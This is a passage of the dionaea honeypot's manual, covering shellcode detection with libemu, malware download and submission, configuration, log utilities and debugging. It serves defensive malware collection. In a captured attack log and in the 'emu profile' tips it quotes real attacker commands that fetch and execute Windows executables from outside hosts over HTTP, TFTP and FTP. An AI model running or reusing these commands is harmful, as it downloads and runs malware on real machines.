2240          GSoc 2010 and GSoc 2011.
2241
2242       SURFnet:
2243          SURFnet has supported the project in the past(2010?-2014?).  Working
2244          with SURFnet is a real pleasure.
2245
2246   Support
2247       If  you  are getting frustrated, because things to not work for you and
2248       you already read the faq, join the ml and share your experience, or the
2249       chat.
2250
2251       GitHub
2252          Use the issue tracker to report any problem.
2253
2254          Website: Issue tracker
2255
2256       IRC
2257          From time to time some of the developers join the #nepenthes channel
2258          on freenode. irc://irc.freenode.org/nepenthes
2259
2260       Mailing List:
2261          Only a few messages every year.  Seems to be dead, no message  since
2262          2015.
2263
2264          Website: Mailinglist nepenthes-devel
2265
2266   Links
2267          • GSoC 2009 Project #10 http://honeynet.org/gsoc/project10
2268
2269The Honeynet Project
2270
2271       Old documentation:
2272

EXPLOITATION

2274       Attackers  do  not  seek  your  service, attackers want to exploit you,
2275       they’ll chat with the service for some packets, and afterwards  sent  a
2276       payload.  dionaea  has to detect and evaluate the payload to be able to
2277       gain a copy of the malware. In order to do so, dionaea uses libemu.
2278
2279       Given certain circumstances, libemu can detect shellcode,  measure  the
2280       shellcode, and if required even execute the shellcode. Shellcode detec‐
2281       tion is done by making use of GetPC  heuristics,  others  wrote  papers
2282       about it, we decided to write libemu to do so. This detection is rather
2283       time consuming, and therefore done using threads.
2284
2285       The part of dionaea which takes care of the network  io  can  create  a
2286       copy  of all in/output run for a connection, this copy is passed to the
2287       detection facility, which is a tree of detection  facilities,  at  this
2288       moment there is only a single leaf, the emu plugin. The emu plugin uses
2289       threads and libemu to detect and profile/measure shellcode.
2290
2291       Shellcode measurement/profiling is done by running the shellcode in the
2292       libemu  vm  and  recording  API calls and arguments. For most shellcode
2293       profiling is sufficient, the recorded API calls  and  arguments  reveal
2294       enough  information  to  get an idea of the attackers intention and act
2295       upon them. For multi-stage  shellcode,  where  the  first  exploitation
2296       stage  of  the shellcode would retrieve a second shellcode from the at‐
2297       tacker, profiling is not sufficient, as we lack the  information  ‘what
2298       to  do’ from the second stage of the shellcode, in this case we need to
2299       make use of shellcode execution. Shellcode execution is  basically  the
2300       same  as  shellcode profiling, the only difference is not recording the
2301       api calls, and we allow the shellcode to take certain actions, for  ex‐
2302       ample creating a network connection.
2303
2304   Payloads
2305       Once we have the payload, and the profile, dionaea has to guess the in‐
2306       tention, and act upon it
2307
2308   Shells - bind/connectback
2309       This payload offers a shell (cmd.exe prompt) to the attacker, either by
2310       binding  a port and waiting for the attacker to connect to us again, or
2311       by connection to the attacker. In both cases, dionaea offers an cmd.exe
2312       emulation  to  the attacker, parses the input, and acts upon the input,
2313       usually the instructions download a file via ftp or tftp.
2314
2315   URLDownloadToFile
2316       These shellcodes use the URLDownloadToFile api call to retrieve a  file
2317       via http, and execute the retrieved file afterwards
2318
2319   Exec
2320       Making  use  of WinExec, these shellcode execute a single command which
2321       has to be parsed and processed like the bind/connectback  shell  shell‐
2322       commands.
2323
2324   Multi Stage Payloads
2325       We never know what the second stage is, therefore libemu is used to ex‐
2326       ecute the shellcode in the libemu vm.
2327

DOWNLOADS

2329       Once dionaea gained the location of the file the attacker wants  it  to
2330       downloads  from  the  shellcode, dionaea will try to download the file.
2331       The protocol to downloads files via tftp  and  ftp  is  implemented  in
2332       python  (ftp.py  and tftp.py) as part of dionaea, downloading files via
2333       http is done in the curl module - which makes use of  libcurl’s  awsome
2334       http capabilities. Of course libcurl can run downloads for ftp too, but
2335       the ftp services embedded in malware a designed to  work  with  windows
2336       ftp.exe client, and fail for others.
2337

SUBMIT

2339       Once dionaea got a copy of the worm attacking her, we may want to store
2340       the file locally for further analysis, or submit the file to  some  3rd
2341       party for further analysis.
2342
2343       dionaea can http/POST the file to several services like CWSandbox, Nor‐
2344       man Sandbox or VirusTotal.
2345

CONFIGURATION - DIONAEA.CONF

2347       If you want to change the software, it is really  important  to  under‐
2348       stand  how  it  works,  therefore please take the time to how it works.
2349       dionaea.conf is the main configuration file, the file controls consists
2350       of sections for:
2351
2352          • logging
2353
2354          • processors
2355
2356          • downloads
2357
2358          • bistreams
2359
2360          • submit
2361
2362          • listen
2363
2364          • modules
2365
2366   logging
2367       The logging section controls … logging, you can specify log domains and
2368       loglevel for different logfiles.  As dionaea is pretty … verbose, it is
2369       useful to rotate the logfiles using logrotate.
2370
2371          # logrotate requires dionaea to be started with a pidfile
2372          # in this case -p /opt/dionaea/var/run/dionaea.pid
2373          # adjust the path to your needs
2374          /opt/dionaea/var/log/dionaea*.log {
2375                  notifempty
2376                  missingok
2377                  rotate 28
2378                  daily
2379                  delaycompress
2380                  compress
2381                  create 660 root root
2382                  dateext
2383                  postrotate
2384                          kill -HUP `cat /opt/dionaea/var/run/dionaea.pid`
2385                  endscript
2386          }
2387
2388       //etc/logrotate.d/dionaea/
2389
2390   modules
2391       downloads specify where to store downloaded malware.  bistreams specify
2392       where to store bi-directional streams, these are pretty useful when de‐
2393       bugging, as they allow to replay an attack on ip-level, without messing
2394       with pcap&tcpreplay, which never worked for me.  submit specifies where
2395       to  send  files to via http or ftp, you can define a new section within
2396       submit if you want to add your own service.  listen sets the  addresses
2397       dionaea  will listen to. The default is all addresses it can find, this
2398       mode is call getifaddrs, but you can set it to  manual  and  specify  a
2399       single  address if you want to limit it.  modules is the most powerfull
2400       section, as it specifies the modules to load, and the options for  each
2401       module.
2402
2403   logsql
2404       This  section controls the logging to the sqlite database.  logsql does
2405       not work when chrooting - python makes the path absolute and fails  for
2406       requests after chroot().
2407
2408       logsql  requires  the directory where the logsql.sqlite file resides to
2409       be writeable by the user, as well as  the  logsql.sqlite  file  itself.
2410       So,  if  you drop user privs, make sure the user you drop to is allowed
2411       to read/write the file and the directory.
2412
2413          chown MYUSER:MYGROUP /var/lib/dionaea -R
2414
2415       To query the logsql database, I recommend looking  at  the  readlogsql‐
2416       tree.py  <#readlogsqltree>  script,  for  visualisation  the gnuplotsql
2417       <#gnuplotsql> script.
2418
2419       The blog on logsql:
2420
24212009-11-06 dionaea sql logging
2422
24232009-12-08 post it yourself
2424
24252009-12-12 sqlite performance
2426
24272009-12-14 virustotal fun
2428
24292009-12-15 paris mission pack avs
2430
24312010-06-06 data visualisation
2432
2433   logxmpp
2434       This section controls the logging to xmpp services. If you want to  use
2435       logxmpp,  make  sure  to enable logxmpp in the ihandler section.  Using
2436       logxmpp allows you to share your new collected files with other sensors
2437       anonymously.
2438
2439       The blog on logxmpp:
2440
24412010-02-10 xmpp backend
2442
24432010-05-12 xmpp take #2
2444
24452010-05-15 xmpp take #3
2446
2447       pg_backend <#pg_backend> can be used as a backend for xmpp logging sen‐
2448       sors.
2449
2450   p0f
2451       Not enabled by default, but recommend: the p0f service, enable  by  un‐
2452       commenting  p0f in the ihandlers section of the python modules section,
2453       and start p0f as suggested in the config. It costs nothing,  and  gives
2454       some  pretty  cool,  even if outdated, informations about the attackers
2455       operating system, and you can look them up from  the  sqlite  database,
2456       even  the  rejected  connections.   If you face problems, here are some
2457       hints.
2458
2459   ihandlers
2460       ihandlers section is used to specify which  ihandlers  get  started  by
2461       ihandlers.py . You do not want to miss p0f and logsql.
2462
2463   services
2464       services controls which services will get started by services.py
2465

UTILS

2467       Dionaea ships with some utils, as these utils are written in python and
2468       rely on the python3 interpreter dionaea requires to operate, this soft‐
2469       ware can be found in modules/python/utils:
2470
2471          readlogsqltree <#readlogsqltree> -
2472          modules/python/readlogsqltree.py
2473
2474       readlogsqltree  is  a  python3  script  which queries the logsql sqlite
2475       database for attacks, and prints out all related information for  every
2476       attack.   This  is  an example for an attack, you get the vulnerability
2477       exploited, the time, the attacker, information about the shellcode, the
2478       file offered for download, and even the virustotal report for the file:
2479
2480          2010-10-07 20:37:27
2481            connection 483256 smbd tcp accept 10.0.1.11:445 <- 93.177.176.190:47650 (483256 None)
2482            dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2483            dcerpc bind: uuid '7d705026-884d-af82-7b3d-961deaeb179a' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2484            dcerpc bind: uuid '7f4fdfe9-2be7-4d6b-a5d4-aa3c831503a1' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2485            dcerpc bind: uuid '8b52c8fd-cc85-3a74-8b15-29e030cdac16' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2486            dcerpc bind: uuid '9acbde5b-25e1-7283-1f10-a3a292e73676' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2487            dcerpc bind: uuid '9f7e2197-9e40-bec9-d7eb-a4b0f137fe95' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2488            dcerpc bind: uuid 'a71e0ebe-6154-e021-9104-5ae423e682d0' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2489            dcerpc bind: uuid 'b3332384-081f-0e95-2c4a-302cc3080783' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2490            dcerpc bind: uuid 'c0cdf474-2d09-f37f-beb8-73350c065268' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2491            dcerpc bind: uuid 'd89a50ad-b919-f35c-1c99-4153ad1e6075' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2492            dcerpc bind: uuid 'ea256ce5-8ae1-c21b-4a17-568829eec306' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2493            dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
2494            profile: [{'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'}, {'return': '0', 'args': ['', 'http://208.53.183.158/m.exe', '60.exe', '0', '0'], 'call': 'URLDownloadToFile'}, {'return': '32', 'args': ['60.exe', '895'], 'call': 'WinExec'}, {'return': '0', 'args': ['-1'], 'call': 'Sleep'}]
2495            offer: http://208.53.183.158/m.exe
2496            download: 3eab379ddac7d80d3e38399fd273ddd4 http://208.53.183.158/m.exe
2497              virustotal 2010-10-07 04:59:07 5/38 (13%) http://www.virustotal.com/file-scan/report.html?id=265e39edcba9d9004451601544e625f2d3d04f837d0aaf1f8464cb2c819c1939-1286420347
2498                names 'High Risk Fraudulent Security Program' 'Suspicious file' 'Trojan.DownLoader1.27100' 'Worm.Win32.Rimecud' 'Worm:Win32/Rimecud.B'
2499
2500       To create such report for your own honeypots activities for the last 24
2501       hours run:
2502
2503          ./readlogsqltree.py  -t $(date '+%s')-24*3600 /var/lib/dionaea/logsql.sqlite
2504
2505
2506          gnuplotsql <#gnuplotsql> - modules/python/gnuplotsql.py
2507
2508       gnuplotsql is a very slow python3 script which runs some queries on the
2509       logsql <#logsql> sqlite database and creates graphs with gnuplot of the
2510       data, stores them on disk and creates an index of the data. The  images
2511       are  per  protocol and look like this: Overview for dionaea smbd.  Here
2512       <gnuplotsql> is how the whole thing looks like.  To create such  images
2513       of your own data, run:
2514
2515          ./gnuplotsql.py -d /var/lib/dionaea/logsql.sqlite -p smbd -p epmapper -p mssqld -p httpd -p ftpd
2516
2517       The blog got something on gnuplotsql as well:
2518
25192010-12-05 sudden death
2520
25212010-10-01 Infosanity’s Blog: gnuplotsql.py
2522
25232010-09-19 gnuplotsql
2524
2525          pg_backend <#pg_backend> - modules/python/xmpp/pg_backend.py
2526
2527       pg_backend  is  the  backend  for logxmpp <#logxmpp>, currently it is a
2528       python2.x script which uses pyxmpp  to  access  the  xmpp  service.  It
2529       parses  the  messages  received  and can store the events in a postgres
2530       database and the received files on disk. pg_backend  requires  an  xmpp
2531       account:
2532
2533          /without db/
2534          ./pg_backend.py -U USER@sensors.carnivore.it -P XMPPPASS -M dionaea.sensors.carnivore.it -C anon-files -C anon-events -f /tmp/
2535
2536          /with db/
2537          create database
2538
2539          psql ...
2540
2541          start backend
2542
2543          ./pg_backend.py -U USER@sensors.carnivore.it -P XMPPPASS -M dionaea.sensors.carnivore.it -C anon-files -C anon-events -s DBHOST -u DBUSER -d xmpp -p DBPASS -f /tmp/
2544

SEGFAULT

2546       In case you experience a segfault, you will see something like this:
2547
2548       This is the end.  This software just had a segmentation fault.  The bug
2549       you encountered may even be exploitable.  If you want to assist in fix‐
2550       ing the bug, please send the backtrace below to nepenthesdev@gmail.com.
2551       You can create better backtraces with gdb, for more  information  visit
2552       http://dionaea.carnivore.it/#segfault  Once you read this message, your
2553       tty may be broken, simply type reset, so it will come to life again:
2554
2555          /opt/dionaea/bin/dionaea(sigsegv_backtrace_cb+0x20)[0x805c11e]
2556          [0x70d420]
2557          /opt/dionaea/lib/libemu/libemu.so.2(emu_env_w32_eip_check+0x94)[0x186974]
2558          /opt/dionaea/lib/dionaea/emu.so(run+0x39)[0x89cced]
2559          /opt/dionaea/lib/dionaea/emu.so(profile+0xbb)[0x89db88]
2560          /opt/dionaea/lib/dionaea/emu.so(proc_emu_on_io_in+0x1e1)[0x89bfc5]
2561          /opt/dionaea/bin/dionaea(recurse_io_process+0x31)[0x805df4a]
2562          /opt/dionaea/bin/dionaea(processors_io_in_thread+0x85)[0x805e08d]
2563          /opt/dionaea/bin/dionaea(threadpool_wrapper+0x2e)[0x805c99a]
2564          /opt/dionaea/lib/libglib-2.0.so.0[0xaa9498]
2565          /opt/dionaea/lib/libglib-2.0.so.0[0xaa7a2f]
2566          /lib/libpthread.so.0[0xd8973b]
2567          /lib/libc.so.6(clone+0x5e)[0x2b3cfe]
2568
2569       While the backtrace itself gives an idea what might be wrong,  it  does
2570       not  fix the problem. To fix the problem, the logfiles usually help, as
2571       dionaea is very verbose by default. Below are some  hints  how  to  get
2572       started with debugging, click here <#support> for assistance.
2573
2574       debugging
2575

VALGRIND

2577       Valgrind does a great job, here is how I use it:
2578
2579          valgrind -v --leak-check=full --leak-resolution=high --show-reachable=yes \
2580           --log-file=dionaea-debug.log /opt/dionaea/bin/dionaea --my-dionaea-options
2581
2582
2583          gdb
2584
2585
2586          logfile assisted
2587
2588       For the above example, I was able to scrape the shellcode from the log‐
2589       file, and run it in libemu, without involving dionaea at all,  reducing
2590       the problem:
2591
2592          gdb /opt/dionaea/bin/sctest
2593          (gdb) run -S -s 10000000 -g < sc.bin
2594          Starting program: /media/sda4/opt64/dionaea/bin/sctest -S -s 10000000 -g < sc.bin
2595
2596       Once it crashed, I retrieved a full backtrace:
2597
2598          Program received signal SIGSEGV, Segmentation fault.
2599          env_w32_hook_GetProcAddress (env=0x629a30, hook=<value optimized out>) at environment/win32/env_w32_dll_export_kernel32_hooks.c:545
2600          545                             struct emu_env_hook *hook = (struct emu_env_hook *)ehi->value;
2601
2602          (gdb) bt full
2603          #0  env_w32_hook_GetProcAddress (env=0x629a30, hook=<value optimized out>) at environment/win32/env_w32_dll_export_kernel32_hooks.c:545
2604                  dll = 0x6366f0
2605                  ehi = <value optimized out>
2606                  hook = <value optimized out>
2607                  c = 0x611180
2608                  mem = <value optimized out>
2609                  eip_save = <value optimized out>
2610                  module = 2088763392
2611                  p_procname = 4289925
2612                  procname = <value optimized out>
2613          #1  0x00007ffff7b884fb in emu_env_w32_eip_check (env=0x629a30) at environment/win32/emu_env_w32.c:306
2614                  dll = <value optimized out>
2615                  ehi = <value optimized out>
2616                  hook = 0x64c5b0
2617                  eip = <value optimized out>
2618          #2  0x0000000000403995 in test (e=0x60f0e0) at sctestmain.c:277
2619                  hook = 0xe2
2620                  ev = 0x0
2621                  iv = <value optimized out>
2622                  cpu = 0x611180
2623                  mem = <value optimized out>
2624                  env = 0x629a30
2625                  na = <value optimized out>
2626                  j = 7169
2627                  last_vertex = 0x0
2628                  graph = 0x0
2629                  eh = 0x0
2630                  ehi = 0x0
2631                  ret = <value optimized out>
2632                  eipsave = 2088807840
2633          #3  0x00000000004044e4 in main (argc=5, argv=0x7fffffffe388) at sctestmain.c:971
2634                  e = <value optimized out>
2635
2636       In this case, the problem was a bug in libemu.
2637          gdb dump memory
2638
2639       Once again, it broke, and we got a backtrace:
2640
2641          #0  0xb70b0b57 in emu_queue_enqueue (eq=0xb3da0918, data=0x4724ab) at emu_queue.c:63
2642                  eqi = (struct emu_queue_item *) 0x0
2643          #1  0xb70b15d1 in emu_shellcode_run_and_track (e=0xb4109cd0, data=0xb411c698 "", datasize=<value optimized out>, eipoffset=<value optimized out>,
2644                  steps=256, etas=0xb410cd60, known_positions=0xb3d7a810, stats_tested_positions_list=0xb3da3bf0, brute_force=true) at emu_shellcode.c:408
2645                  current_pos_ti_diff = (struct emu_tracking_info *) 0x88c3c88
2646                  current_pos_ht = <value optimized out>
2647                  current_pos_v = <value optimized out>
2648                  current_pos_satii = (struct emu_source_and_track_instr_info *) 0xb407e7f8
2649                  bfs_queue = (struct emu_queue *) 0xb3e17668
2650                  ret = 4662443
2651                  eipsave = <value optimized out>
2652                  hook = <value optimized out>
2653                  j = 4
2654                  es = <value optimized out>
2655                  eli = (struct emu_list_item *) 0xb3e17658
2656                  cpu = (struct emu_cpu *) 0xb4109ab0
2657                  mem = (struct emu_memory *) 0xb410c3a0
2658                  eq = (struct emu_queue *) 0xb3da0918
2659                  env = (struct emu_env *) 0xb3e10208
2660                  eli = (struct emu_list_item *) 0x4724ab
2661          #2  0xb70b1a2a in emu_shellcode_test (e=0xb4109cd0, data=0xb411c698 "", size=<value optimized out>) at emu_shellcode.c:546
2662                  es = (struct emu_stats *) 0xb3d92b28
2663                  new_results = (struct emu_list_root *) 0xb3da3bf0
2664                  offset = <value optimized out>
2665                  el = (struct emu_list_root *) 0xb4100510
2666                  etas = (struct emu_track_and_source *) 0xb410cd60
2667                  eh = (struct emu_hashtable *) 0xb3d7a810
2668                  eli = (struct emu_list_item *) 0xb3d92b40
2669                  results = (struct emu_list_root *) 0xb3d82850
2670                  es = <value optimized out>
2671                  __PRETTY_FUNCTION__ = "emu_shellcode_test"
2672          #3  0xb712140c in proc_emu_on_io_in (con=0x8864b58, pd=0x87dc388) at detect.c:145
2673                  e = (struct emu *) 0xb4109cd0
2674                  ctx = (struct emu_ctx *) 0x87a2400
2675                  offset = 14356
2676                  streamdata = (void *) 0xb411c698
2677                  size = 8196
2678                  ret = 0
2679                  __PRETTY_FUNCTION__ = "proc_emu_on_io_in"
2680          #4  0x0805e8be in recurse_io_process (pd=0x87dc388, con=0x8864b58, dir=bistream_in) at processor.c:167
2681          No locals.
2682          #5  0x0805ea01 in processors_io_in_thread (data=0x8864b58, userdata=0x87dc388) at processor.c:197
2683                  con = (struct connection *) 0x8864b58
2684                  pd = (struct processor_data *) 0x87dc388
2685                  __PRETTY_FUNCTION__ = "processors_io_in_thread"
2686          #6  0x0805d2da in threadpool_wrapper (data=0x87d7bd0, user_data=0x0) at threads.c:49
2687                  t = (struct thread *) 0x87d7bd0
2688                  timer = (GTimer *) 0xb4108540
2689          #7  0xb77441f6 in g_thread_pool_thread_proxy (data=0x83db460) at gthreadpool.c:265
2690                  task = (gpointer) 0x87d7bd0
2691                  pool = (GRealThreadPool *) 0x83db460
2692          #8  0xb7742b8f in g_thread_create_proxy (data=0x83dc7d0) at gthread.c:635
2693                  __PRETTY_FUNCTION__ = "g_thread_create_proxy"
2694          #9  0xb76744c0 in start_thread () from /lib/i686/cmov/libpthread.so.0
2695          No symbol table info available.
2696          #10 0xb75f36de in clone () from /lib/i686/cmov/libc.so.6
2697          No symbol table info available.
2698
2699       Again,  it  was a bug in libemu, an unbreakable loop consuming all mem‐
2700       ory.  To reproduce, we have to dump the  tested  buffer,  therefore  we
2701       need  the  buffers address and size. Luckily the size is noted in frame
2702       #2 as 8196 and and the data address is a parameter which got not  opti‐
2703       mized out for frame #2:
2704
2705          dump binary memory /tmp/sc.bin 0xb411c698 0xb411e89c
2706
2707       Afterwards, debugging libemu by feeding the data into sctest is easy.
2708
2709       I’ve  had  fun with objgraph and gdb debugging reference count leaks in
2710       python too, here  <http://carnivore.it/2009/12/23/arcane_bugs>  is  the
2711       writeup:
2712
2713          gdb python3 embedded
2714
2715       Sometimes,  there  is  something wrong with the python scripts, but gdb
2716       does not provide any useful output:
2717
2718          bt full
2719          #12 0xb765f12d in PyEval_EvalFrameEx (f=0x825998c, throwflag=0) at Python/ceval.c:2267
2720                  stack_pointer = (PyObject **) 0x8259af0
2721                  next_instr = (unsigned char *) 0x812fabf "m'"
2722                  opcode = 100
2723                  oparg = <value optimized out>
2724                  why = 3071731824
2725                  err = 1
2726                  x = (PyObject *) 0xb7244aac
2727                  v = <value optimized out>
2728                  w = (PyObject *) 0xadb5e4dc
2729                  u = (PyObject *) 0xb775ccb0
2730                  freevars = (PyObject **) 0x8259af0
2731                  retval = (PyObject *) 0x0
2732                  tstate = (PyThreadState *) 0x809aab0
2733                  co = (PyCodeObject *) 0xb717b800
2734                  instr_ub = -1
2735                  instr_lb = 0
2736                  instr_prev = -1
2737                  first_instr = (unsigned char *) 0x812f918 "t"
2738                  names = (PyObject *) 0xb723f50c
2739                  consts = (PyObject *) 0xb71c9f7c
2740                  opcode_targets = {0xb765d202, 0xb765f60a, 0xb766133a, 0xb76612db, 0xb7661285, 0xb7661222, 0xb765d202, 0xb765d202, 0xb765d202, 0xb76611dd,
2741            0xb766114b, 0xb76610b9, 0xb766100f, 0xb765d202, 0xb765d202, 0xb7660f7d, 0xb765d202, 0xb765d202, 0xb765d202, 0xb7660eb7, 0xb7660dfb, 0xb765d202,
2742            0xb7660d30, 0xb7660c65, 0xb7660ba9, 0xb7660aed, 0xb7660a31, 0xb7660975, 0xb76608b9, 0xb76607fd, 0xb765d202 <repeats 24 times>, 0xb7660736, 0xb766066b,
2743            0xb76605af, 0xb76604f3, 0xb765d202, 0xb7660437, 0xb766035d, 0xb76602ad, 0xb7661aba, 0xb76619fe, 0xb7661942, 0xb7661886, 0xb7661b76, 0xb76614a8,
2744            0xb7661413, 0xb766138e, 0xb766171f, 0xb76616e6, 0xb765d202, 0xb765d202, 0xb765d202, 0xb766162a, 0xb766156e, 0xb76601f1, 0xb7660135, 0xb76617ca,
2745            0xb7660120, 0xb765fff7, 0xb765d202, 0xb765fd72, 0xb765fc6e, 0xb765d202, 0xb765fc1d, 0xb765fe17, 0xb765fd90, 0xb765fec0, 0xb765fb41, 0xb765fadc,
2746            0xb765f9ed, 0xb765f94d, 0xb765f8be, 0xb765f7e3, 0xb765f779, 0xb765f6bd, 0xb765f66c, 0xb765ef1d, 0xb765eea2, 0xb765ede1, 0xb765ed1a, 0xb765ec35,
2747            0xb765ebc3, 0xb765eb30, 0xb765ea69, 0xb765f1c7, 0xb765f027, 0xb765f560, 0xb765efc1, 0xb76630e3, 0xb766310c, 0xb765e64c, 0xb765e592, 0xb765f49a,
2748            0xb765f3de, 0xb765d202, 0xb765d202, 0xb765f39e, 0xb7663135, 0xb766315f, 0xb765e9cb, 0xb765d202, 0xb765e948, 0xb765e8bb, 0xb765e817, 0xb765d202,
2749            0xb765d202, 0xb765d202, 0xb765d2ae, 0xb765e3e0, 0xb7663275, 0xb765e1a2, 0xb766324e, 0xb765e0ba, 0xb765e01e, 0xb765df74, 0xb765d202, 0xb765d202,
2750            0xb7663189, 0xb76631d3, 0xb7663220, 0xb765e149, 0xb765d202, 0xb765de09, 0xb765dec0, 0xb765f2c0, 0xb765d202 <repeats 108 times>}
2751          #13 0xb7664ac0 in PyEval_EvalCodeEx (co=0xb717b800, globals=0xb7160b54, locals=0x0, args=0x84babb8, argcount=9, kws=0x0, kwcount=0, defs=0xb719e978,
2752                  defcount=1, kwdefs=0x0, closure=0x0) at Python/ceval.c:3198
2753                  f = (PyFrameObject *) 0x825998c
2754                  retval = <value optimized out>
2755                  freevars = (PyObject **) 0x8259af0
2756                  tstate = (PyThreadState *) 0x809aab0
2757                  x = <value optimized out>
2758                  u = <value optimized out>
2759
2760       Luckily python3 ships with some gdb macros,  which  assist  in  dealing
2761       with    this    mess.    You    can    grab    them    over   here   <‐
2762       http://svn.python.org/view/python/tags/r311/Misc/gdbinit?view=markup>,
2763       place  them  to  ~/.gdbinit,  where  ~ is the homedirectory of the user
2764       dionaea runs as.   If  you  get  /warning:  not  using  untrusted  file
2765       “/home/user/.gdbinit”/  you  are  running  gdb  via  sudo, and the file
2766       /home/user/.gdbinit has to be owned by root.  If  you  are  running  as
2767       root,  and  you get /Program received signal SIGTTOU, Stopped (tty out‐
2768       put)./, run stty -nostop before running gdb, reattach the process  with
2769       fg, close gdb properly, and start over.
2770
2771       Once  you  got  the macros loaded properly at gdb startup, set a break‐
2772       point on PyEval_EvalFrameEx after dionaea loaded everything:
2773
2774          break PyEval_EvalFrameEx
2775
2776       Then we have some useful macros for gdb:
2777
2778          up
2779          pyframev
2780
2781       pyframev combines the output of pyframe and pylocals.
2782
2783       Be aware you can segfault dionaea now from within gdb, going up, out of
2784       the  python  call  stack and calling some of the macros can and in most
2785       cases will segfault dionaea, therefore use backtrace to make  sure  you
2786       are  still  within  valid  frames.  We can’t use pystack or pystackv as
2787       they rely on Py_Main, which  is  an  invalid  assumption  for  embedded
2788       python.
2789

TIPS AND TRICKS

2791       dionaea embedds a python interpreter, and can offer a python cli there‐
2792       fore too.  The python cli is blocking, if you start entering a command,
2793       the  whole  process  will wait for you to finish it, and not accept any
2794       new connections.  You can use the python cli to interact with  dionaea,
2795       which is very useful for development and debugging.
2796
2797   Configuration
2798       You can access the dionaea.conf via python (readonly):
2799
2800          from dionaea import g_dionaea
2801          g_dionaea.config()
2802
2803   Completition and History on the CLI
2804       If you use the cli often, you can make it behave like a real shell, in‐
2805       cluding history and completition.:
2806
2807          import rlcompleter, readline
2808          readline.parse_and_bind('tab: complete')
2809
2810   Triggering Downloads
2811       Sometimes it helps to trigger a download, without waiting  for  an  at‐
2812       tack.   Very  useful if you want to verify permissions are correct when
2813       switching the user, or making sure a submission to a  3rd  party  works
2814       correctly.  You can trigger downloads for all major protocols.
2815
2816   ftp
2817          from dionaea.ftp import ftp
2818          f = ftp()
2819          f.download(None, 'anonymous','guest','ftp.kernel.org',21, 'welcome.msg', 'binary','ftp://ftp.kernel.org/welcome.msg')
2820
2821   tftp
2822          from dionaea.tftp import TftpClient
2823          t = TftpClient()
2824          t.download(None, 'tftp.example.com', 69, 'filename')
2825
2826   http
2827       As  the http download is not done in python, we do not use the download
2828       facility directly, but create an incident, which will trigger the down‐
2829       load:
2830
2831          from dionaea.core import incident
2832          i = incident("dionaea.download.offer")
2833          i.set("url", "http://www.honeynet.org")
2834          i.report()
2835
2836   incidents
2837       incidents are the ipc used in dionaea.
2838
2839   dumping
2840          from dionaea.core import ihandler
2841          class idumper(ihandler):
2842                  def __init__(self, pattern):
2843                          ihandler.__init__(self, pattern)
2844                  def handle(self, icd):
2845                          icd.dump()
2846
2847          a = idumper('*')
2848
2849   emu profile
2850       Small collection of various shellcode profiles gatherd from dionaea.
2851
2852   CreateProcess Commands
2853       This profile will trigger a download via tftp.
2854
2855          p='[{"call": "CreateProcess", "args": ["", "tftp.exe -i 92.17.46.208 get ssms.exe", "", "", "1", "40", "", "", {"dwXCountChars": "0", "dwFillAttribute": "0", "hStdInput": "0", "dwYCountChars": "0", "cbReserved2": "0", "cb": "0", "dwX": "0", "dwY": "0", "dwXSize": "0", "lpDesktop": "0", "hStdError": "68", "dwFlags": "0", "lpReserved": "0", "lpReserved2": "0", "hStdOutput": "0", "lpTitle": "0", "dwYSize": "0", "wShowWindow": "0"}, {"dwProcessId": "4712", "hProcess": "4711", "dwThreadId": "4714", "hThread": "4712"}], "return": "-1"}, {"call": "CreateProcess", "args": ["", "ssms.exe", "", "", "1", "40", "", "", {"dwXCountChars": "0", "dwFillAttribute": "0", "hStdInput": "0", "dwYCountChars": "0", "cbReserved2": "0", "cb": "0", "dwX": "0", "dwY": "0", "dwXSize": "0", "lpDesktop": "0", "hStdError": "68", "dwFlags": "0", "lpReserved": "0", "lpReserved2": "0", "hStdOutput": "0", "lpTitle": "0", "dwYSize": "0", "wShowWindow": "0"}, {"dwProcessId": "4712", "hProcess": "4711", "dwThreadId": "4714", "hThread": "4712"}], "return": "-1"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]'
2856          from dionaea.core import incident
2857          i = incident("dionaea.module.emu.profile")
2858          i.set("profile", str(p))
2859          i.report()
2860
2861   URLDownloadToFile
2862       This profile will trigger a download.
2863
2864          p='[{"call": "LoadLibraryA", "args": ["urlmon"], "return": "0x7df20000"}, {"call": "URLDownloadToFile", "args": ["", "http://82.165.32.34/compiled.exe", "47.scr", "0", "0"], "return": "0"}, {"call": "WinExec", "args": ["47.scr", "895"], "return": "32"}]'
2865          from dionaea.core import incident
2866          i = incident("dionaea.module.emu.profile")
2867          i.set("profile", str(p))
2868          i.report()
2869
2870   WinExec Commands
2871       This  profile  uses  WinExec  to  create a command file for windows ftp
2872       client, downloads a file, and executes the file.:
2873
2874          p='[{"call": "WinExec", "args": ["cmd /c echo open welovewarez.com 21 > i&echo user wat l0l1 >> i &echo get SCUM.EXE >> i &echo quit >> i &ftp -n -s:i &SCUM.EXE\\r\\n", "0"], "return": "32"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]'
2875          from dionaea.core import incident
2876          i = incident("dionaea.module.emu.profile")
2877          i.set("profile", str(p))
2878          i.report()
2879
2880       • genindex
2881
2882       • modindex
2883
2884       • search
2885

AUTHOR

2887       dionaea
2888
2890       2021, dionaea
2891
2892
2893
2894
28950.7.0                            Jul 21, 2021                       DIONAEA(1)
Impressum